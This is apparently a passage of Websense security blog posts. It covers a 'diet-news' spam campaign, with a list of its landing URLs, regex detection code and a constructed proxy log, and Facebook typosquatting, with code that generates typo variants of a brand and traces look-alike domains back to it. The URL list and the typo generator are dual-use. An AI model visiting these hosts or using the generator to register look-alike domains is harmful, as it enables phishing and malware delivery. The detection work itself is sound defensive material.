http://diet-news.e86.report.i63.http1n.com/

http://diet-news.d8b.report.1b2.httpao.com/

http://diet-news.4rv.report.ezi.httpum.com/

http://diet-news.ice.report.75l.httpmn8.com/

http://diet-news.wja.report.95k.htttp45.com/

http://diet-news.aki.report.uks.httpy4.com/

http://diet-news.5fh.report.yeb.http1c.com/

http://diet-news.ly8.report.o4i.httpvv8.com/

Websense customers are protected from these threats by ACE, our Advanced Classification Engine.
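The URLs listed above share fixed shapes: a blogspot.com lure whose subdomain is a "learn/find-out how to be/get thing" phrase followed by five random characters, a redirector reached with a ?s=15yy<n> query, and an ibibo landing host of the form diet-news.<3 chars>.report.<3 chars>.http<chars>.com with a doubled or tripled "t". The Python below is an added example, not Websense's ACE logic: it encodes those shapes as patterns, classifies each URL by the campaign component it belongs to, and runs the classifier over a constructed proxy log (the log format, timestamps and client addresses are made up) so that hits can be tallied per client for follow-up.

```python
"""Pattern-based detection for the 'Lost Weight' spam infrastructure.
Added example, not Websense's detection logic; the log below is constructed."""
import re
from collections import Counter
from urllib.parse import urlparse

# Lure hosts on blogspot.com: fixed phrase + 5 random characters.
BLOGSPOT_LURE_RE = re.compile(
    r"^(?:learn|find-out)-how-to-(?:be|get)-thing[a-z0-9]{5}\.blogspot\.com$")
# ibibo landing hosts: diet-news.<3>.report.<3>.ht{2,3}p<2-3 chars>.com
IBIBO_LANDING_RE = re.compile(
    r"^diet-news\.[a-z0-9]{3}\.report\.[a-z0-9]{3}\.ht{2,3}p[a-z0-9]{2,3}\.com$")
# Redirector: short .com host, identified by its ?s=15yy<n> query string.
REDIRECT_QUERY_RE = re.compile(r"^s=15yy\d+$")


def classify_url(url):
    """Return the campaign component a URL belongs to, or None."""
    p = urlparse(url)
    host = (p.hostname or "").lower()
    if BLOGSPOT_LURE_RE.match(host):
        return "lure-blogspot"
    if IBIBO_LANDING_RE.match(host):
        return "landing-ibibo"
    if host.endswith(".com") and REDIRECT_QUERY_RE.match(p.query):
        return "redirector"
    return None


# Constructed proxy log: "timestamp client method url status". Not real traffic;
# the last line is a benign look-alike that must not match.
SAMPLE_PROXY_LOG = """\
1323993600.101 10.0.0.21 GET http://learn-how-to-be-thinghhfwi.blogspot.com/ 302
1323993600.355 10.0.0.21 GET http://ad2ac.com/?s=15yy1 302
1323993601.020 10.0.0.37 GET http://diet-news.m9q.report.qfz.htttp96.com/ 503
1323993602.777 10.0.0.37 GET https://www.facebook.com/home.php 200
1323993603.000 10.0.0.42 GET http://learn-how-to-be-thin.blogspot.com/ 200
"""


def scan_log(text):
    """Return (client, url, label) for every request that matches a campaign pattern."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue
        client, url = parts[1], parts[3]
        label = classify_url(url)
        if label:
            hits.append((client, url, label))
    return hits


def hits_per_client(hits):
    """Count matched requests per client so the affected users can be followed up."""
    return dict(Counter(client for client, _, _ in hits))


if __name__ == "__main__":
    found = scan_log(SAMPLE_PROXY_LOG)
    for h in found:
        print(h)
    print(hits_per_client(found))
```

A client that reaches the redirector after the lure (10.0.0.21 in the constructed log) clicked through, which is the case worth a look; a lone lure hit may only be a preview fetch.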


uwang

Typosquatting
Posted: 24 Oct 2011 08:42 PM

Do you often make mistakes when typing? Is the Backspace key your friend? Well, you are not alone!
Most of us make typing errors once in a while, but what if those errors could cause data leakage? 


Typosquatting exploits common typing errors made when entering a Web address in a browser--typing “a” instead of “s”, for example, or “e” instead of “r”--resulting in URL hijacking, malware injection, or phishing. Popular social networking sites, like Facebook, are often targets of typosquatting. With over 800 million active users, it’s no surprise the social networking giant is a target of such exploits.

Say you’re in a hurry to check out the latest update from your friends on facebook.com, but in your excitement, you enter faccenook.com instead.  There could be several outcomes. If the Web site designers anticipated your clumsiness, you still get to the desired destination. Otherwise, you might get an error message saying that the page is unavailable.  Or you could get a page that looks like facebook.com, but that actually redirects you to phishing or other potentially harmful sites, injects malware, infects your system with spyware, and ruins your day.

After carefully studying the objectionable links generated by common typos for Facebook, we found that over 62% of links lead to bot networks, phishing, or malicious web sites. 


Websense Security Labs researchers investigated the top ranked domain (www.facebook.com) and generated common typos based on keyboard character distance, common repeats, and even omissions, anticipating common typos that result in fake or malicious pages. Websense software protects users, their data, and their systems with its unique backtracking algorithm to identify altered domain names. The Advanced Classification Engine (ACE) provides real-time content analysis to keep you safe no matter how bad a tyspist yu aree.
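The two mechanisms in that last paragraph, generating the typos you expect and recognising an observed domain as an altered form of a protected one, can be reproduced in a few dozen lines. The Python below is an added example and not Websense's algorithm: generate_typos() produces the single-slip variants (adjacent-key substitution on an approximate QWERTY layout, doubled key, omitted key) that a brand owner might register or watch, and backtrack() does the reverse, undoing up to two such slips to see whether a name such as faccenook.com, which is one doubled "c" and one adjacent-key "n" away, maps back to facebook. The keyboard layout, the two-edit bound and the second-level-label extraction in check_domain() are simplifying assumptions.

```python
"""Typo generation and backtracking against a list of protected labels.
Added example, not Websense's algorithm."""
import string

# Approximate QWERTY adjacency (assumption): a key neighbours the keys beside it
# and the three keys above and below it; real key offsets are staggered.
ROWS = ["qwertyuiop", "asdfghjkl", "zxcvbnm"]


def _build_adjacency():
    adj = {}
    for r, row in enumerate(ROWS):
        for i, ch in enumerate(row):
            neighbours = set()
            for rr in (r - 1, r, r + 1):
                if 0 <= rr < len(ROWS):
                    for ii in (i - 1, i, i + 1):
                        if 0 <= ii < len(ROWS[rr]) and ROWS[rr][ii] != ch:
                            neighbours.add(ROWS[rr][ii])
            adj[ch] = neighbours
    return adj


ADJ = _build_adjacency()


def generate_typos(label):
    """Single-slip variants of a label: adjacent-key hit, doubled key, omitted key."""
    out = set()
    for i, ch in enumerate(label):
        for nb in ADJ.get(ch, ()):
            out.add(label[:i] + nb + label[i + 1:])   # keyboard distance
        out.add(label[:i] + ch + label[i:])           # common repeat
        out.add(label[:i] + label[i + 1:])            # omission
    out.discard(label)
    return out


def _undo_one(label):
    """Labels reachable by undoing one slip, each with a description of the slip."""
    for i, ch in enumerate(label):
        if i + 1 < len(label) and label[i + 1] == ch:
            yield label[:i] + label[i + 1:], f"collapse doubled '{ch}'"
        for nb in ADJ.get(ch, ()):
            yield label[:i] + nb + label[i + 1:], f"'{ch}' was an adjacent-key hit for '{nb}'"
    for i in range(len(label) + 1):
        for ch in string.ascii_lowercase:
            yield label[:i] + ch + label[i:], f"restore omitted '{ch}' at position {i}"


def backtrack(label, protected, max_edits=2):
    """Breadth-first search undoing up to max_edits slips; returns (brand, edits) or None."""
    protected = set(protected)
    if label in protected:
        return label, []
    frontier = [(label, [])]
    seen = {label}
    for depth in range(max_edits):
        remaining = max_edits - depth - 1
        nxt = []
        for cur, path in frontier:
            for cand, desc in _undo_one(cur):
                if cand in seen:
                    continue
                seen.add(cand)
                if cand in protected:
                    return cand, path + [desc]
                # Prune: the length gap to some protected label must be closable
                # with the edits still available.
                if min(abs(len(cand) - len(p)) for p in protected) <= remaining:
                    nxt.append((cand, path + [desc]))
        frontier = nxt
    return None


def check_domain(host, protected=("facebook",)):
    """Classify a hostname by its second-level label (simplification: ignores co.uk-style suffixes)."""
    labels = host.lower().rstrip(".").split(".")
    sld = labels[-2] if len(labels) >= 2 else labels[0]
    hit = backtrack(sld, protected)
    if hit is None:
        return {"host": host, "brand": None, "edits": []}
    return {"host": host, "brand": hit[0], "edits": hit[1]}


if __name__ == "__main__":
    print(len(generate_typos("facebook")), "single-slip variants of facebook")
    print(check_domain("faccenook.com"))
```

The breadth-first order means the first match found is also the one with the fewest undone slips, and the length prune keeps the search small even though restoring an omitted key tries every letter at every position. Raising max_edits widens the net but also raises the chance that an unrelated short name is pulled back to a brand, so a production filter would weight the three slip types rather than count them equally.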



©2013 Websense, Inc. All Rights Reserved.